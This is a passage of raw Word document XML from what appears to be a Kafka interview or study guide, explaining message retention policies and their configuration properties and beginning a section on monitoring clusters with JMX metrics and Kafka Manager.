    </w:p>
    <w:p w14:paraId="7846693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ypes of Retention Policies in Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403F77DD"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Kafka allows messages to be retained for a specific amount of time. After the configured time period expires, the messages are eligible for deletion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE63020"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ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D12978"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determines how long Kafka should keep the messages in the log. The value is specified in milliseconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D30C56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for 1 day (24 hours):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2310B31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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B4451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nfiguration ensures that messages older than 1 day will be deleted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CA555F"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Kafka can also be configured to retain messages until the partition size exceeds a certain threshold. Once the log segment size exceeds the specified size, older messages are eligible for deletion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353A0031"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bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D263A1C"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specifies the maximum size of the log for a partition. When the size exceeds this value, Kafka will delete the oldest messages to maintain the size limit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9003A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until the partition size exceeds 10 GB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E8584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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8FBAB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Kafka also offers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cleanup.policy=compact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC7E242"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Enable log compaction for a topic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4F3051"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BFD8B7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bination of Time and Size</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka allows combining both time-based and size-based retention policies. This means a topic can be configured to either retain messages until a certain time limit is reached </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> until the topic’s size exceeds a specified threshold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DC07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0C14FCF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retention policies can be configured both at the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>broker</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> level (default settings) and at th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level (specific settings). You can override the default retention policy for specific topics by setting retention configurations at the topic level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C38936D"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opic-Level Retention Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417C8953"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can use the kafka-topics.sh script to set retention configurations for a specific topic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AD0EFD"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Set the time-based retention for a specific topic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4724F7F2"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7048D84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retain messages in the topic for 1 day (86400000 ms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359EF690"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Set the size-based retention for a specific topic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E65BE11"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10395E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limit the partition size to 10 GB, and older messages will be deleted once the size exceeds this limit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DDDF0E"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Set the log compaction policy for a specific topic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C2CA3D"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58D5822A"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Retention Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EF76C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default, Kafka retains messages for </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7 days</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (log.retention.ms=604800000), and the maximum log size for each partition is unlimited. You can modify these defaults based on your use case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAC6AE3"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6613"/>
        <w:gridCol w:w="1809"/>
      </w:tblGrid>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="1C05F196" w14:textId="77777777" w:rsidTr="00684E32">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="338D61F4"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51F39F29"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0A2DD9B7"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4D9A021D" w14:textId="77777777" w:rsidTr="00684E32">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B11D27F"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5C525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Messages older than this time will be deleted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="572F534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051259B" w14:textId="77777777" w:rsidTr="00684E32">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="284FE50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og.retention.bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C123D3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Logs are deleted when the log size exceeds this value.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02C37AF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64E0FB40" w14:textId="77777777" w:rsidTr="00684E32">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="641C76E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30AC40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Can be delete (default) or compact.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F1006C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A9DEB8D" w14:textId="77777777" w:rsidTr="00684E32">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2613A2D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5A5BBF3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size of each log segment file.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CC487E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bl>
    <w:p w14:paraId="47626321"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siderations When Setting Retention Policy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2481B9D7"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and Consumer Lag</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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orage Space Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Carefully configure retention policies to avoid excessive disk usage. Size-based retention is often used when storage space is a concern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB76673"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is ideal for cases where you need to store only the latest value for each key (e.g., tracking the latest state of an entity like user profiles).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E211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2CC2B5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ention policies allow you to control how long messages are stored in topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B9A6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Retain messages for a specific time period.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21353C6B"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Retain messages until the partition size exceeds a limit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125B8607"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Retain only the latest message for each key in a topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C317403"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topic-level configuration overrides to customize retention behavior for specific topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703C7D24"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the correct retention policy, you can optimize storage, manage disk usage, and ensure consumers can read data as needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373CEFDC" w14:textId="6B06481A"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396" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BAA846" w14:textId="280C5D9D"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1" w:name="_Toc197868055"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Describe how Kafka retains messages and the different retention policies available (time-based, size-based, etc.)</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="841"/>
    </w:p>
    <w:p w14:paraId="1E5F626E" w14:textId="2765ADF3" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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xml:space="preserve">, along with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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4FE37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Mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD5127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Time-Based Retention (log.retention.ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DC612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for a specified period, after which the messages are eligible for deletion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6987C02D"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ms property, where you define the time duration in milliseconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E46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2F9929C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  # Retain messages for 1 day (86400000 ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E4A7EA"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xml:space="preserve">: Kafka tracks the timestamp of each message in the log. When the retention time expires for a message, Kafka marks it for deletion. However, messages are not deleted immediately but during the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log segment cleanup</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which happens periodically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0A6FB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xml:space="preserve">: The default retention period is </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7 days (604800000 ms)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if not configured explicitly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176C595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Time-based retention is ideal when you know you need to keep messages for a specific duration (e.g., keeping logs of user activities for a week).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ABDEE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Size-Based Retention (log.retention.bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069339A2"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until the total size of the logs exceeds a configured size, at which point the oldest messages are eligible for deletion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5916BD0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bytes property, where you specify the maximum log size in bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585F038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5016EBD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  # Retain messages until partition size exceeds 10 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A619D5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ow It Works</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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By default, Kafka does not impose a size limit (-1), which means log size is not a constraint unless explicitly defined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404FC9A6"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og Compaction (log.cleanup.policy=compact)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1C1839"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You can enable log compaction by setting the log.cleanup.policy to compact for a topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0406FBD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1AF8502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327DB55"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mbination of Time and Size-Based Retention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FED7A4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Additional Configurations Related to Retention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204AC920"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bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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1073741824  # 1 GB per log segment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1564DCF3"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delete.delay.ms</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Configures the delay between marking a log segment for deletion and the actual deletion of the segment. The default is 60000 (60 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597D2254"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delete.delay.ms=60000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309AD85E"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retention.check.interval.ms</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Configures how often Kafka checks for eligible logs to delete. The default value is 300000 (5 minutes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6B5E8C"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300000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1516F6E1"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2D09DD4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nfigure retention policies per topic using the kafka-topics.sh tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7B71F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time-based retention</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D0FEC2"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3CCA181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size-based retention</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300B0C5D"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32E615B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log compaction policy</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDCD83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165F86AE"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318"/>
        <w:gridCol w:w="1830"/>
      </w:tblGrid>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="41CF9420" w14:textId="77777777" w:rsidTr="00C50A4B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69BE8CB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4E2A0C1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3E1EE1F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7339E428" w14:textId="77777777" w:rsidTr="00C50A4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53726FD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83920E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in milliseconds).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72B05F0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925B1BA" w14:textId="77777777" w:rsidTr="00C50A4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EF2CC4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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1394132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in bytes).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32B01BC2"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40B42398" w14:textId="77777777" w:rsidTr="00C50A4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="261FF4A7"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2F97A7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delete or compact.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27DC1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488043E" w14:textId="77777777" w:rsidTr="00C50A4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59C666F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2B690F6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 segment size (in bytes).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="788013E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r w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="375DC38A" w14:textId="77777777" w:rsidTr="00C50A4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5117A67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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1359612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val for retention cleanup check (in ms).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66F09A5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00000 (5 minutes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="232346FF"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B67718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397" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B78AB1" w14:textId="6F26753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2" w:name="_Toc197868056"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How can you monitor a Kafka cluster</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="842"/>
    </w:p>
    <w:p w14:paraId="0F4B47D0" w14:textId="1F86D9BC" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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Using Kafka’s JMX Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA992C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xposes a wide variety of metrics via </w:t>
      </w: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These metrics can be used to monitor various aspects of Kafka's operation, including broker performance, message throughput, and consumer lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0371184B"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 via JMX:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BD9E9C"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p>
    <w:p w14:paraId="197A845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MessagesInPerSec: Measures the number of messages received per second by the broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C33C3E4"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InPerSec: Measures the number of bytes received per second by the broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EEC3D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OutPerSec: Measures the number of bytes sent per second by the broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADBE9EB"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ReplicaManager,name=UnderReplicatedPartitions: Number of under-replicated partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A9BBE8"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LogFlushStats,name=LogFlushTimeMs: Time taken to flush logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079A7D77"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p>
    <w:p w14:paraId="4CCBEAF6"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ProduceRequestsPerSecond: Number of produce requests per second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4601CA11"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RequestSize: Size of the produce requests in bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB1BAD4"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p>
    <w:p w14:paraId="365929E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FetcherManager,name=FetchRequestRateAndTimeMs: Fetch request rate and response time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A8BF4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Coordinator,name=CommitLag: Consumer commit lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BE1FF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JMX Monitoring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DE2505"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need to configure Kafka brokers to expose metrics over JMX by adding the following JMX-related options in the Kafka broker configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3F112E"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082B574"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is is configured, you can use JMX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2177EF45"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Using Kafka Manager (or CMAK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1122F28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Manager (previously known as CMAK - </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cluster Manager for Apache Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) is an open-source tool that allows you to monitor and manage Kafka clusters. It provides a user-friendly interface to perform tasks like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BECAF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ewing the status of brokers and topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267CEF6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ecking consumer group details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F8E017"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the number of partitions and under-replicated partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B9A97F"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playing the consumer lag for each topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A8507D"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Features</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2824C612"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s managing multiple Kafka clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CF6147"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visibility into cluster health and performance metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD3B83D"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lps track consumer group offsets and lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184FAE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set it up by following the installation and configuration steps on the </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="0003272F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            <w:color w:val="auto"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>Kafka Manager GitHub repository</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
